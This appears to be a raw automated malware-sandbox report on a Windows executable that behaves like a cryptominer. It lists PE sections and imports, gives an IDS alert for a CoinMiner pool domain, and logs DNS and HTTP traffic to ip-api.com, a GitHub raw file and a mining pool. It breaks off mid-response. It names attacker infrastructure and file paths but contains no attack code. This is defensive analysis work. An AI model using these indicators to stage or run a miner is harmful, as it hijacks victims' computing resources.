                                                                                                                                        .pdata0x420000x22c80x2400b142de92a6283807ff34839c180f053cFalse0.4743923611111111data5.326103127679494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        _RDATA0x450000x15c0x200ee29821d11e5dd21c3e807a502fa5813False0.38671875data2.83326547900447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x460000x16b40x18000835425949a1b25789cb1265c656d2a9False0.6048177083333334data5.944758384070383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x480000x7580x8007813f7270f60606010808eaa88aee14bFalse0.5439453125data5.24418466384704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_ICON0x460e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.6737804878048781
                                                                                                                                        RT_GROUP_ICON0x471900x14data1.1
                                                                                                                                        RT_MANIFEST0x471a40x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                        DLLImport
                                                                                                                                        USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                        COMCTL32.dll
                                                                                                                                        KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                        ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                        GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                        03/01/24-15:22:10.789667UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)6341753192.168.2.41.1.1.1
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Mar 1, 2024 15:22:00.247355938 CET4972980192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:00.340511084 CET8049729208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:00.340667963 CET4972980192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:00.341361046 CET4972980192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:00.436213970 CET8049729208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:00.478470087 CET4972980192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:01.808372021 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:01.808402061 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:01.809842110 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:01.829166889 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:01.829181910 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.017334938 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.017518044 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:02.021337032 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:02.021348000 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.021593094 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.072247028 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:02.119625092 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:02.161910057 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.257281065 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.257577896 CET44349730185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:02.257683992 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:02.266155958 CET49730443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:06.676457882 CET4972980192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:10.891581059 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:10.891645908 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:10.891720057 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:10.892591953 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:10.892610073 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:11.198739052 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:11.244092941 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:12.807816982 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:12.807864904 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:12.809129000 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:12.809204102 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:12.811022043 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:12.811104059 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:12.925769091 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:12.925795078 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:13.056597948 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:13.056638002 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:13.079005003 CET4973280192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:13.173953056 CET8049732208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:13.174063921 CET4973280192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:13.174366951 CET4973280192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:13.244097948 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:13.269547939 CET8049732208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:13.353462934 CET4973280192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:14.394870043 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.394911051 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.394998074 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.502151966 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.502188921 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.684576035 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.684680939 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.700006962 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.700018883 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.700244904 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.719293118 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.761919975 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.858841896 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.858964920 CET44349733185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:14.859061003 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:14.861790895 CET49733443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:22.123678923 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:22.244127035 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:31.717763901 CET4974880192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:31.811039925 CET8049748208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:31.811191082 CET4974880192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:31.811541080 CET4974880192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:31.938570023 CET8049748208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:32.009726048 CET4974880192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:32.865030050 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:32.865081072 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:32.865142107 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:32.908052921 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:32.908070087 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.091387987 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.091546059 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:33.093722105 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:33.093734980 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.094130039 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.114403963 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:33.157912970 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.284838915 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.284989119 CET44349749185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:33.285048008 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:33.287220955 CET49749443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:39.896111012 CET4975780192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:39.990602970 CET8049757208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:39.990768909 CET4975780192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:39.991136074 CET4975780192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:40.086672068 CET8049757208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:40.244123936 CET4975780192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:40.905316114 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:40.905369043 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:40.905435085 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:40.935847044 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:40.935878038 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.117261887 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.117363930 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:41.120178938 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:41.120197058 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.120496035 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.135762930 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:41.181914091 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.291223049 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.291352034 CET44349759185.199.111.133192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:41.291412115 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:41.293765068 CET49759443192.168.2.4185.199.111.133
                                                                                                                                        Mar 1, 2024 15:22:41.719918013 CET4975780192.168.2.4208.95.112.1
                                                                                                                                        Mar 1, 2024 15:22:44.126456976 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:44.244240999 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:46.585103035 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:46.744112968 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:22:52.024883032 CET8049732208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:01.089523077 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:01.244262934 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:23:08.094238997 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:08.244162083 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:23:10.468542099 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:10.556763887 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:23:32.066222906 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:32.259763956 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:23:36.016357899 CET8049748208.95.112.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:54.095241070 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:23:54.259711027 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        Mar 1, 2024 15:24:01.089876890 CET44349731142.202.242.43192.168.2.4
                                                                                                                                        Mar 1, 2024 15:24:01.244136095 CET49731443192.168.2.4142.202.242.43
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Mar 1, 2024 15:22:00.142525911 CET6438553192.168.2.41.1.1.1
                                                                                                                                        Mar 1, 2024 15:22:00.233918905 CET53643851.1.1.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:01.718862057 CET5084853192.168.2.41.1.1.1
                                                                                                                                        Mar 1, 2024 15:22:01.806911945 CET53508481.1.1.1192.168.2.4
                                                                                                                                        Mar 1, 2024 15:22:10.789666891 CET6341753192.168.2.41.1.1.1
                                                                                                                                        Mar 1, 2024 15:22:10.886464119 CET53634171.1.1.1192.168.2.4
                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Mar 1, 2024 15:22:00.142525911 CET192.168.2.41.1.1.10x7d5fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:01.718862057 CET192.168.2.41.1.1.10xd7e4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:10.789666891 CET192.168.2.41.1.1.10x1b1fStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Mar 1, 2024 15:22:00.233918905 CET1.1.1.1192.168.2.40x7d5fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:01.806911945 CET1.1.1.1192.168.2.40xd7e4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:01.806911945 CET1.1.1.1192.168.2.40xd7e4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:01.806911945 CET1.1.1.1192.168.2.40xd7e4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:01.806911945 CET1.1.1.1192.168.2.40xd7e4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:10.886464119 CET1.1.1.1192.168.2.40x1b1fNo error (0)pool.hashvault.pro142.202.242.45A (IP address)IN (0x0001)false
                                                                                                                                        Mar 1, 2024 15:22:10.886464119 CET1.1.1.1192.168.2.40x1b1fNo error (0)pool.hashvault.pro142.202.242.43A (IP address)IN (0x0001)false
                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                        • ip-api.com
                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.449729208.95.112.1807748C:\ProgramData\main.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Mar 1, 2024 15:22:00.341361046 CET65OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Mar 1, 2024 15:22:00.436213970 CET474INHTTP/1.1 200 OK
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:00 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 297
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 60
                                                                                                                                        X-Rl: 44
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        1192.168.2.449732208.95.112.180
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Mar 1, 2024 15:22:13.174366951 CET65OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Mar 1, 2024 15:22:13.269547939 CET474INHTTP/1.1 200 OK
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:12 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 297
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 47
                                                                                                                                        X-Rl: 43
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        2192.168.2.449748208.95.112.180
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Mar 1, 2024 15:22:31.811541080 CET65OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Mar 1, 2024 15:22:31.938570023 CET474INHTTP/1.1 200 OK
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:31 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 297
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 28
                                                                                                                                        X-Rl: 42
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        3192.168.2.449757208.95.112.180
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Mar 1, 2024 15:22:39.991136074 CET65OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Mar 1, 2024 15:22:40.086672068 CET474INHTTP/1.1 200 OK
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:39 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 297
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 20
                                                                                                                                        X-Rl: 41
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.449730185.199.111.1334437748C:\ProgramData\main.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-03-01 14:22:02 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-03-01 14:22:02 UTC889INHTTP/1.1 200 OK
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 38
                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                        Content-Type: text/plain; charset=utf-8
